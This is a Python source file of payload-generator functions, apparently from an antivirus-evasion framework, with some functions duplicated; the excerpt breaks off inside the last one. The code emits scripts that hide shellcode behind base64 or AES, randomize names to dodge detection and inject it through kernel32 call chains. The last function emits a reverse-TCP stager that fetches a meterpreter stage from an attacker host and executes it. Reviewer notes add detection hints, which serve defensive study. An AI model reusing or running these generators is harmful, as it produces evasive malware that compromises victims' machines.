def generate(self):
    """Build the Python source of a self-injecting shellcode payload.

    The shellcode comes either from ``self.cli_shellcode`` or from
    ``self.shellcode.generate(self.cli_opts)``.  It is base64-encoded and
    spliced into a script that decodes it and runs it inside its own
    process through ``ctypes.windll.kernel32``.  The kernel32 call chain
    that is emitted depends on ``required_options["INJECT_METHOD"]``
    ("virtual" or "heap"); any other value leaves ``payload_code`` as
    whatever ``gamemaker.senecas_games`` returned.  The result is stored
    in ``self.payload_source_code``; the method returns ``None``.

    NOTE(review): only the identifiers in the emitted script are
    randomized (``evasion_helpers.randomString``).  The kernel32 call
    sequence and the allocation/protection constants are fixed, so a
    detection should key on that chain rather than on names.
    """
    # Generate the shellcode
    if not self.cli_shellcode:
        Shellcode = self.shellcode.generate(self.cli_opts)
        # Record which kind of shellcode was produced, for the caller's bookkeeping
        if self.shellcode.msfvenompayload:
            self.payload_type = self.shellcode.msfvenompayload
        elif self.shellcode.payload_choice:
            self.payload_type = self.shellcode.payload_choice
            self.shellcode.payload_choice = ''
        # assume custom shellcode
        else:
            self.payload_type = 'custom'
    else:
        Shellcode = self.cli_shellcode
    # Turn the "\xNN" escaped text form into the raw byte values (one char per byte)
    Shellcode = Shellcode.encode('latin-1')
    Shellcode = Shellcode.decode('unicode_escape')
    # Base64 Encode Shellcode
    EncodedShellcode = base64.b64encode(bytes(Shellcode, 'latin-1')).decode('ascii')
    # Generate Random Variable Names
    ShellcodeVariableName = evasion_helpers.randomString()
    rand_ptr = evasion_helpers.randomString()
    rand_ht = evasion_helpers.randomString()
    randctypes = evasion_helpers.randomString()
    rand_virtual_protect = evasion_helpers.randomString()
    # NOTE(review): both of these initial values are overwritten by the next line
    num_tabs_required = 0
    payload_code = ''
    # gamemaker supplies the preamble and the indentation depth the rest must use
    payload_code, num_tabs_required = gamemaker.senecas_games(self)
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
        payload_code += '\t' * num_tabs_required + 'import base64\n'
        payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(\"' + EncodedShellcode + '\")\n'
        # Emitted chain: VirtualAlloc(MEM_COMMIT|MEM_RESERVE=0x3000, PAGE_READWRITE=0x04)
        # -> RtlMoveMemory -> VirtualProtect(PAGE_EXECUTE_READ=0x20) -> CreateThread -> WaitForSingleObject(INFINITE)
        payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x04))\n'
        payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
        payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n'
        payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
        payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        HeapVar = evasion_helpers.randomString()
        payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
        payload_code += '\t' * num_tabs_required + 'import base64\n'
        payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(\"' + EncodedShellcode + '\")\n'
        # Emitted chain: HeapCreate(HEAP_CREATE_ENABLE_EXECUTE=0x00040000) -> HeapAlloc(HEAP_ZERO_MEMORY=0x00000008)
        # -> RtlMoveMemory -> CreateThread -> WaitForSingleObject(INFINITE); no VirtualProtect step here
        payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
        payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
        payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
        payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
        payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
    # Optional post-processing of the whole generated source (what pyherion does is not visible here)
    if self.required_options["USE_PYHERION"][0].lower() == "y":
        payload_code = encryption.pyherion(payload_code)
    self.payload_source_code = payload_code
    return
def generate(self):
    """Build the Python source of a self-injecting shellcode payload.

    Near-duplicate of the base64 "flat" generator above: the shellcode is
    taken from ``self.cli_shellcode`` or produced by
    ``self.shellcode.generate(self.cli_opts)``, base64-encoded, and
    spliced into a script that decodes it and runs it in-process through
    ``ctypes.windll.kernel32``.  ``required_options["INJECT_METHOD"]``
    selects the "virtual" or "heap" call chain; any other value emits only
    the ``gamemaker.senecas_games`` preamble.  The result is stored in
    ``self.payload_source_code``; the method returns ``None``.

    NOTE(review): identifiers in the emitted script are randomized, the
    kernel32 call sequence and its constants are not.
    """
    # Generate the shellcode
    if not self.cli_shellcode:
        Shellcode = self.shellcode.generate(self.cli_opts)
        # Record which kind of shellcode was produced
        if self.shellcode.msfvenompayload:
            self.payload_type = self.shellcode.msfvenompayload
        elif self.shellcode.payload_choice:
            self.payload_type = self.shellcode.payload_choice
            self.shellcode.payload_choice = ""
        # assume custom shellcode
        else:
            self.payload_type = 'custom'
    else:
        Shellcode = self.cli_shellcode
    # Turn the "\xNN" escaped text form into raw byte values (one char per byte)
    Shellcode = Shellcode.encode('latin-1')
    Shellcode = Shellcode.decode('unicode_escape')
    # Base64 Encode Shellcode
    EncodedShellcode = base64.b64encode(bytes(Shellcode, 'latin-1')).decode('ascii')
    # Generate Random Variable Names
    ShellcodeVariableName = evasion_helpers.randomString()
    rand_ptr = evasion_helpers.randomString()
    rand_ht = evasion_helpers.randomString()
    randctypes = evasion_helpers.randomString()
    rand_virtual_protect = evasion_helpers.randomString()
    # NOTE(review): both initial values are overwritten by the next line
    num_tabs_required = 0
    payload_code = ""
    # gamemaker supplies the preamble and the indentation depth the rest must use
    payload_code, num_tabs_required = gamemaker.senecas_games(self)
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
        payload_code += '\t' * num_tabs_required + 'import base64\n'
        payload_code += '\t' * num_tabs_required + ShellcodeVariableName +' = base64.b64decode(\"' + EncodedShellcode + '\")\n'
        # Emitted chain: VirtualAlloc(0x3000, PAGE_READWRITE=0x04) -> RtlMoveMemory
        # -> VirtualProtect(PAGE_EXECUTE_READ=0x20) -> CreateThread -> WaitForSingleObject(INFINITE)
        payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x04))\n'
        payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
        payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n'
        payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
        payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        HeapVar = evasion_helpers.randomString()
        payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
        payload_code += '\t' * num_tabs_required + 'import base64\n'
        payload_code += '\t' * num_tabs_required + ShellcodeVariableName +' = base64.b64decode(\"' + EncodedShellcode + '\")\n'
        # Emitted chain: HeapCreate(HEAP_CREATE_ENABLE_EXECUTE=0x00040000) -> HeapAlloc(HEAP_ZERO_MEMORY=0x00000008)
        # -> RtlMoveMemory -> CreateThread -> WaitForSingleObject(INFINITE); no VirtualProtect step
        payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
        payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
        payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
        payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
        payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
    # Optional post-processing of the generated source (pyherion's behaviour is not visible here)
    if self.required_options["USE_PYHERION"][0].lower() == "y":
        payload_code = encryption.pyherion(payload_code)
    self.payload_source_code = payload_code
    return
def generate(self):
    """Build the Python source of a remote-process shellcode injector.

    Emits a script that opens the process whose id is
    ``required_options["PID_NUMBER"]`` with 0x1F0FFF (PROCESS_ALL_ACCESS),
    allocates 0x40 (PAGE_EXECUTE_READWRITE) memory in it with
    ``VirtualAllocEx``, copies the shellcode in with ``WriteProcessMemory``
    and starts it with ``CreateRemoteThread`` — the canonical
    cross-process injection chain that host-based detections look for.
    The result is stored in ``self.payload_source_code``; returns ``None``.

    NOTE(review): unlike the in-process generators, the shellcode text is
    spliced straight into a ``b'...'`` literal with no latin-1 /
    unicode_escape round-trip, and ``PID_NUMBER`` is spliced in as raw
    text; neither value is validated here.
    """
    # gamemaker supplies the preamble and the indentation depth the rest must use
    payload_code, num_tabs_required = gamemaker.senecas_games(self)
    # Generate the shellcode
    if not self.cli_shellcode:
        Shellcode = self.shellcode.generate(self.cli_opts)
        # Record which kind of shellcode was produced
        if self.shellcode.msfvenompayload:
            self.payload_type = self.shellcode.msfvenompayload
        elif self.shellcode.payload_choice:
            self.payload_type = self.shellcode.payload_choice
            self.shellcode.payload_choice = ""
        # assume custom shellcode
        else:
            self.payload_type = 'custom'
    else:
        Shellcode = self.cli_shellcode
    # Generate Random Variable Names
    ShellcodeVariableName = evasion_helpers.randomString()
    pid_num_variable = evasion_helpers.randomString()
    pagerwx_variable = evasion_helpers.randomString()
    processall_variable = evasion_helpers.randomString()
    memcommit_variable = evasion_helpers.randomString()
    shell_length_variable = evasion_helpers.randomString()
    memalloc_variable = evasion_helpers.randomString()
    prochandle_variable = evasion_helpers.randomString()
    kernel32_variable = evasion_helpers.randomString()
    # Create Payload code
    payload_code += '\t' * num_tabs_required + 'from ctypes import *\n'
    # Win32 constants: PAGE_EXECUTE_READWRITE, PROCESS_ALL_ACCESS, MEM_COMMIT
    payload_code += '\t' * num_tabs_required + pagerwx_variable + ' = 0x40\n'
    payload_code += '\t' * num_tabs_required + processall_variable + ' = 0x1F0FFF\n'
    payload_code += '\t' * num_tabs_required + memcommit_variable + ' = 0x00001000\n'
    payload_code += '\t' * num_tabs_required + kernel32_variable + ' = windll.kernel32\n'
    payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = b\'' + Shellcode + '\'\n'
    payload_code += '\t' * num_tabs_required + pid_num_variable + ' = ' + self.required_options[ "PID_NUMBER"][0] + '\n'
    payload_code += '\t' * num_tabs_required + shell_length_variable + ' = len(' + ShellcodeVariableName + ')\n'
    # Emitted chain: OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread
    payload_code += '\t' * num_tabs_required + prochandle_variable + ' = ' + kernel32_variable + '.OpenProcess(' + processall_variable + ', False, ' + pid_num_variable + ')\n'
    payload_code += '\t' * num_tabs_required + memalloc_variable + ' = ' + kernel32_variable + '.VirtualAllocEx(' + prochandle_variable + ', 0, ' + shell_length_variable + ', ' + memcommit_variable + ', ' + pagerwx_variable + ')\n'
    payload_code += '\t' * num_tabs_required + kernel32_variable + '.WriteProcessMemory(' + prochandle_variable + ', ' + memalloc_variable + ', ' + ShellcodeVariableName + ', ' + shell_length_variable + ', 0)\n'
    payload_code += '\t' * num_tabs_required + kernel32_variable + '.CreateRemoteThread(' + prochandle_variable + ', None, 0, ' + memalloc_variable + ', 0, 0, 0)\n'
    # Optional post-processing of the generated source (pyherion's behaviour is not visible here)
    if self.required_options["USE_PYHERION"][0].lower() == "y":
        payload_code = encryption.pyherion(payload_code)
    self.payload_source_code = payload_code
    return
def generate(self):
    """Build the Python source of a remote-process shellcode injector.

    Duplicate of the PID-injection generator above (only whitespace
    differs).  The emitted script opens ``required_options["PID_NUMBER"]``
    with 0x1F0FFF (PROCESS_ALL_ACCESS), allocates 0x40
    (PAGE_EXECUTE_READWRITE) memory with ``VirtualAllocEx``, writes the
    shellcode with ``WriteProcessMemory`` and runs it with
    ``CreateRemoteThread``.  Result goes to ``self.payload_source_code``;
    returns ``None``.

    NOTE(review): the shellcode text and ``PID_NUMBER`` are spliced into
    the output as raw text without the escape round-trip or validation the
    other generators perform.
    """
    # gamemaker supplies the preamble and the indentation depth the rest must use
    payload_code, num_tabs_required = gamemaker.senecas_games(self)
    # Generate the shellcode
    if not self.cli_shellcode:
        Shellcode = self.shellcode.generate(self.cli_opts)
        # Record which kind of shellcode was produced
        if self.shellcode.msfvenompayload:
            self.payload_type = self.shellcode.msfvenompayload
        elif self.shellcode.payload_choice:
            self.payload_type = self.shellcode.payload_choice
            self.shellcode.payload_choice = ""
        # assume custom shellcode
        else:
            self.payload_type = 'custom'
    else:
        Shellcode = self.cli_shellcode
    # Generate Random Variable Names
    ShellcodeVariableName = evasion_helpers.randomString()
    pid_num_variable = evasion_helpers.randomString()
    pagerwx_variable = evasion_helpers.randomString()
    processall_variable = evasion_helpers.randomString()
    memcommit_variable = evasion_helpers.randomString()
    shell_length_variable = evasion_helpers.randomString()
    memalloc_variable = evasion_helpers.randomString()
    prochandle_variable = evasion_helpers.randomString()
    kernel32_variable = evasion_helpers.randomString()
    # Create Payload code
    payload_code += '\t' * num_tabs_required + 'from ctypes import *\n'
    # Win32 constants: PAGE_EXECUTE_READWRITE, PROCESS_ALL_ACCESS, MEM_COMMIT
    payload_code += '\t' * num_tabs_required + pagerwx_variable + ' = 0x40\n'
    payload_code += '\t' * num_tabs_required + processall_variable + ' = 0x1F0FFF\n'
    payload_code += '\t' * num_tabs_required + memcommit_variable + ' = 0x00001000\n'
    payload_code += '\t' * num_tabs_required + kernel32_variable + ' = windll.kernel32\n'
    payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = b\'' + Shellcode + '\'\n'
    payload_code += '\t' * num_tabs_required + pid_num_variable + ' = ' + self.required_options["PID_NUMBER"][0] +'\n'
    payload_code += '\t' * num_tabs_required + shell_length_variable + ' = len(' + ShellcodeVariableName + ')\n'
    # Emitted chain: OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread
    payload_code += '\t' * num_tabs_required + prochandle_variable + ' = ' + kernel32_variable + '.OpenProcess(' + processall_variable + ', False, ' + pid_num_variable + ')\n'
    payload_code += '\t' * num_tabs_required + memalloc_variable + ' = ' + kernel32_variable + '.VirtualAllocEx(' + prochandle_variable + ', 0, ' + shell_length_variable + ', ' + memcommit_variable + ', ' + pagerwx_variable + ')\n'
    payload_code += '\t' * num_tabs_required + kernel32_variable + '.WriteProcessMemory(' + prochandle_variable + ', ' + memalloc_variable + ', ' + ShellcodeVariableName + ', ' + shell_length_variable + ', 0)\n'
    payload_code += '\t' * num_tabs_required + kernel32_variable + '.CreateRemoteThread(' + prochandle_variable + ', None, 0, ' + memalloc_variable + ', 0, 0, 0)\n'
    # Optional post-processing of the generated source (pyherion's behaviour is not visible here)
    if self.required_options["USE_PYHERION"][0].lower() == "y":
        payload_code = encryption.pyherion(payload_code)
    self.payload_source_code = payload_code
    return
def generate(self):
    """Use a user-supplied Python file as the payload source.

    Reads the file named by ``required_options["PYTHON_SOURCE"]`` and
    stores its text in ``self.payload_source_code``, optionally passed
    through ``encryption.pyherion`` first.

    NOTE(review): the two exit paths are inconsistent — on ``IOError`` this
    prints a warning and returns ``""`` without touching
    ``self.payload_source_code``, while on success it returns ``None``.  A
    caller that only inspects the attribute will see a stale or missing
    value after a failed read; confirm how the caller distinguishes the
    two before relying on either signal.
    """
    PYTHON_SOURCE = self.required_options["PYTHON_SOURCE"][0]
    try:
        # read in the python source
        with open(PYTHON_SOURCE, 'r') as f:
            payload_code = f.read()
    except IOError:
        print(helpers.color("\n [!] PYTHON_SOURCE file \"" + PYTHON_SOURCE + "\" not found\n", warning=True))
        return ""
    # example of how to check the internal options
    if self.required_options["USE_PYHERION"][0].lower() == "y":
        payload_code = encryption.pyherion(payload_code)
    # return everything
    self.payload_source_code = payload_code
    return
def generate(self):
    """Use a user-supplied Python file as the payload source.

    Duplicate of the PYTHON_SOURCE generator above (only line wrapping
    differs).  Reads ``required_options["PYTHON_SOURCE"]`` into
    ``self.payload_source_code``, optionally via ``encryption.pyherion``.

    NOTE(review): on ``IOError`` this returns ``""`` and leaves
    ``self.payload_source_code`` unset, whereas the success path returns
    ``None`` — the two signals are inconsistent; check the caller before
    relying on either.
    """
    PYTHON_SOURCE = self.required_options["PYTHON_SOURCE"][0]
    try:
        # read in the python source
        with open(PYTHON_SOURCE, 'r') as f:
            payload_code = f.read()
    except IOError:
        print( helpers.color("\n [!] PYTHON_SOURCE file \"" + PYTHON_SOURCE + "\" not found\n", warning=True))
        return ""
    # example of how to check the internal options
    if self.required_options["USE_PYHERION"][0].lower() == "y":
        payload_code = encryption.pyherion(payload_code)
    # return everything
    self.payload_source_code = payload_code
    return
def generate(self):
    """Build the Python source of an AES-wrapped self-injecting payload.

    The shellcode (from ``self.cli_shellcode`` or
    ``self.shellcode.generate``) is encrypted by
    ``encryption.aes_encryption``; the emitted script decodes and decrypts
    it with ``Crypto.Cipher.AES`` in CBC mode and then runs it in-process
    through ``ctypes.windll.kernel32``, using the "virtual" or "heap"
    chain selected by ``required_options["INJECT_METHOD"]``.  Result goes
    to ``self.payload_source_code``; returns ``None``.

    NOTE(review): ``encryption_key`` and ``iv_value`` are spliced into the
    emitted script as literals next to the ciphertext, so this is
    obfuscation, not confidentiality — anyone holding the script can
    recover the plaintext without any secret.  The emitted script also
    needs ``Crypto`` (PyCrypto/PyCryptodome) installed on the host that
    runs it.
    """
    # Generate the variable names
    randctypes = evasion_helpers.randomString()
    ShellcodeVariableName = evasion_helpers.randomString()
    rand_ptr = evasion_helpers.randomString()
    rand_ht = evasion_helpers.randomString()
    RandEncShellCodePayload = evasion_helpers.randomString()
    RandCipherObject = evasion_helpers.randomString()
    rand_virtual_protect = evasion_helpers.randomString()
    # Generate the shellcode
    if not self.cli_shellcode:
        Shellcode = self.shellcode.generate(self.cli_opts)
        # Record which kind of shellcode was produced
        if self.shellcode.msfvenompayload:
            self.payload_type = self.shellcode.msfvenompayload
        elif self.shellcode.payload_choice:
            self.payload_type = self.shellcode.payload_choice
            self.shellcode.payload_choice = ""
        # assume custom shellcode
        else:
            self.payload_type = 'custom'
    else:
        Shellcode = self.cli_shellcode
    # Turn the "\xNN" escaped text form into raw byte values (one char per byte)
    Shellcode = Shellcode.encode('latin-1')
    Shellcode = Shellcode.decode('unicode_escape')
    # gamemaker supplies the preamble and the indentation depth the rest must use
    payload_code, num_tabs_required = gamemaker.senecas_games(self)
    # encrypt the shellcode and get our randomized key
    encoded_ciphertext, encryption_key, iv_value = encryption.aes_encryption(Shellcode)
    encoded_ciphertext = encoded_ciphertext.decode('ascii')
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        # Create Payload code
        payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
        payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import AES\n'
        payload_code += '\t' * num_tabs_required + 'import base64\n'
        # Key and IV land in the script as plain literals
        payload_code += '\t' * num_tabs_required + RandCipherObject + ' = AES.new(\'' + encryption_key + '\', AES.MODE_CBC, \'' + iv_value + '\')\n'
        payload_code += '\t' * num_tabs_required + RandEncShellCodePayload + ' = base64.b64decode(\'' + encoded_ciphertext + '\')\n'
        payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = ' + RandCipherObject + '.decrypt(' + RandEncShellCodePayload + ')\n'
        # Emitted chain: VirtualAlloc(0x3000, PAGE_READWRITE=0x04) -> RtlMoveMemory
        # -> VirtualProtect(PAGE_EXECUTE_READ=0x20) -> CreateThread -> WaitForSingleObject(INFINITE)
        payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x04))\n'
        payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
        payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n'
        payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
        payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        HeapVar = evasion_helpers.randomString()
        # Create Payload code
        payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
        payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import AES\n'
        payload_code += '\t' * num_tabs_required + 'import base64\n'
        # Key and IV land in the script as plain literals
        payload_code += '\t' * num_tabs_required + RandCipherObject + ' = AES.new(\'' + encryption_key + '\', AES.MODE_CBC, \'' + iv_value + '\')\n'
        payload_code += '\t' * num_tabs_required + RandEncShellCodePayload + ' = base64.b64decode(\'' + encoded_ciphertext + '\')\n'
        payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = ' + RandCipherObject + '.decrypt(' + RandEncShellCodePayload + ')\n'
        # Emitted chain: HeapCreate(HEAP_CREATE_ENABLE_EXECUTE=0x00040000) -> HeapAlloc(HEAP_ZERO_MEMORY=0x00000008)
        # -> RtlMoveMemory -> CreateThread -> WaitForSingleObject(INFINITE); no VirtualProtect step
        payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
        payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
        payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
        payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
        payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
    # Optional post-processing of the generated source (pyherion's behaviour is not visible here)
    if self.required_options["USE_PYHERION"][0].lower() == "y":
        payload_code = encryption.pyherion(payload_code)
    self.payload_source_code = payload_code
    return
def generate(self):
    """Build the Python source of a reverse-TCP stage downloader/injector.

    Unlike the other generators, no shellcode is embedded.  The emitted
    script defines two functions: one connects to
    ``required_options["LHOST"]``:``["LPORT"]``, reads a 4-byte
    little-endian length, receives that many bytes, overwrites the first
    five bytes of the buffer with ``0xBF`` followed by the packed socket
    descriptor (the original author's comment describes this as loading
    the fd into edi), and returns the buffer; the other copies that buffer
    into executable memory and runs it on a new thread using the
    "virtual" or heap chain chosen by ``required_options["INJECT_METHOD"]``.
    Result goes to ``self.payload_source_code``; returns ``None``.

    NOTE(review): the emitted ``except: return None`` swallows every
    exception in the network function, so a failed connection produces no
    diagnostic in the script.  From a detection standpoint the observable
    behaviour is an outbound TCP connection to a fixed host:port followed
    immediately by the VirtualAlloc(0x40)/RtlMoveMemory/CreateThread (or
    HeapCreate/HeapAlloc) sequence in the same process.
    """
    # randomize all of the variable names used
    shellCodeName = evasion_helpers.randomString()
    socketName = evasion_helpers.randomString()
    getDataMethodName = evasion_helpers.randomString()
    fdBufName = evasion_helpers.randomString()
    rcvStringName = evasion_helpers.randomString()
    rcvCStringName = evasion_helpers.randomString()
    injectMethodName = evasion_helpers.randomString()
    tempShellcodeName = evasion_helpers.randomString()
    shellcodeBufName = evasion_helpers.randomString()
    fpName = evasion_helpers.randomString()
    tempCBuffer = evasion_helpers.randomString()
    randctypes = evasion_helpers.randomString()
    payload_code = "import struct, socket, binascii, ctypes as " + randctypes + ", random, time\n"
    # How I'm tracking the number of nested tabs needed
    # to make the payload
    num_tabs_required = 0
    payload_code2, num_tabs_required = gamemaker.senecas_games(self)
    payload_code = payload_code + payload_code2
    # socket and shellcode variables that need to be kept global
    payload_code += '\t' * num_tabs_required + "%s, %s = None, None\n" % (shellCodeName,socketName)
    # build the method that creates a socket, connects to the handler,
    # and downloads/patches the meterpreter .dll
    payload_code += '\t' * num_tabs_required + "def %s():\n" %(getDataMethodName)
    payload_code += '\t' * num_tabs_required + "\ttry:\n"
    payload_code += '\t' * num_tabs_required + "\t\tglobal %s\n" %(socketName)
    # build the socket and connect to the handler
    payload_code += '\t' * num_tabs_required + "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" %(socketName)
    payload_code += '\t' * num_tabs_required + "\t\t%s.connect(('%s', %s))\n" %(socketName,self.required_options["LHOST"][0],self.required_options["LPORT"][0])
    # pack the underlying socket file descriptor into a c structure
    payload_code += '\t' * num_tabs_required + "\t\t%s = struct.pack('<i', %s.fileno())\n" % (fdBufName,socketName)
    # unpack the length of the payload, received as a 4 byte array from the handler
    payload_code += '\t' * num_tabs_required + "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" %(socketName)
    # receive buffer starts as a single placeholder byte, which the 0xBF write below overwrites
    payload_code += '\t' * num_tabs_required + "\t\t%s = b\" \"\n" % (rcvStringName)
    # receive ALL of the payload .dll data
